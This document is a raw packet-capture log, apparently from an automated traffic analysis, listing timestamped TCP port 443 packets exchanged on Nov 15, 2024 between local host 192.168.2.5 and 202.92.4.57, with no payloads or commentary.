                                                                                                                                                                                                    Nov 15, 2024 09:00:18.902717113 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.902756929 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.902769089 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.902811050 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.902837038 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.903244972 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.903284073 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.903348923 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.903362989 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.903407097 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.903424978 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.904230118 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.904270887 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.904314995 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.904326916 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.904359102 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.904378891 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.904759884 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.904798031 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.904829025 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.904840946 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.904870033 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.904895067 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.905258894 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.905299902 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.905359983 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.905373096 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.905397892 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.905421972 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906297922 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906337023 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906377077 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906388998 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906415939 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906433105 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906470060 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906507969 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906543970 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906554937 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906584978 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906614065 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906651974 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906691074 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906724930 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906737089 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906766891 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906835079 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906878948 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906908035 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906920910 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906949043 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.906972885 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907025099 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907064915 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907100916 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907118082 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907145023 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907174110 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907211065 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907250881 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907289028 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907300949 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907337904 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907360077 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907424927 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907463074 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907499075 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907510996 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907540083 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907557964 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907604933 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907644033 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907680035 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907691002 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907722950 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907740116 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907776117 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907814026 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907845020 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907855988 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907888889 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907908916 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907913923 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907939911 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907979012 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.907984972 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.908015966 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.908027887 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.908056974 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.908086061 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.910660982 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.910712004 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.910752058 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.910763979 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.910789967 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.910815001 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.911286116 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.911343098 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.911375046 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.911387920 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.911413908 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.911438942 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.911500931 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.911542892 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.911576033 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.911587954 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.911623001 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.911643982 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.911847115 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.911885023 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.911917925 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.911930084 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.911957979 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.911978006 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912066936 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912106037 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912139893 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912152052 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912178040 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912203074 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912348032 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912386894 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912424088 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912435055 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912462950 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912487030 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912605047 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912643909 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912683010 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912694931 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912720919 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912745953 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912950993 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.912988901 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.913024902 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.913037062 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.913064957 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.913081884 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.913091898 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.913114071 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.913153887 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.913157940 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.913194895 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.913206100 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.913233995 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.913256884 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.913306952 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.913346052 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.913376093 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.913387060 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.913414955 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.913434982 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.913963079 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.914001942 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.914040089 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.914051056 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.914078951 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.914227962 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.914271116 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.914298058 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.914310932 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.914336920 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.914371967 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.914534092 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.914571047 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.914608955 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.914619923 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.914648056 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.914671898 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.927591085 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.927632093 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.927813053 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.927819014 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.927819014 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.927891970 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.927937031 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.927937984 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.927959919 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.927974939 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.928009033 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.928030968 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.928040981 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.928076029 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.928112984 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.928329945 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.928329945 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.928329945 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.928401947 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.928482056 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.961879015 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.961920023 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.961992025 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962024927 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962045908 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962145090 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962196112 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962238073 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962265015 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962274075 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962311983 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962359905 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962480068 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962518930 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962546110 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962553024 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962584019 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962606907 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962702990 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962743998 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962763071 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962769985 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.962800026 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.963247061 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.022792101 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.022834063 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.022964001 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.022964001 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.022994995 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023047924 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023117065 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023196936 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023196936 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023228884 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023283005 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023395061 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023435116 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023591042 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023638964 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023644924 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023644924 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023708105 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023761988 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023761988 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023761988 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023853064 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023893118 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023943901 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023968935 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.023997068 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024166107 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024210930 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024235010 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024247885 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024281025 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024431944 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024470091 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024507046 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024525881 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024553061 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024636030 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024681091 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024708033 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024720907 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024749041 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024827003 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024863958 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024903059 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024916887 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.024947882 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025125980 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025170088 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025196075 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025208950 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025263071 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025382042 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025454044 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025461912 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025480032 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025521040 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025646925 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025691032 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025713921 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025727034 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025759935 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025857925 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025896072 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025922060 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025934935 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.025968075 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.026177883 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.026221991 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.026245117 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:19.026257038 CET44349704202.92.4.57192.168.2.5
